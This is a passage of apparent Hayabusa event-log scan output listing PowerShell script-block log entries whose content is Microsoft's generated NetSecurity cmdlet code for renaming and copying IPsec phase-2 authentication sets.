if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQ",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"uery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecPhase2AuthSet' -Alias '*' function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and 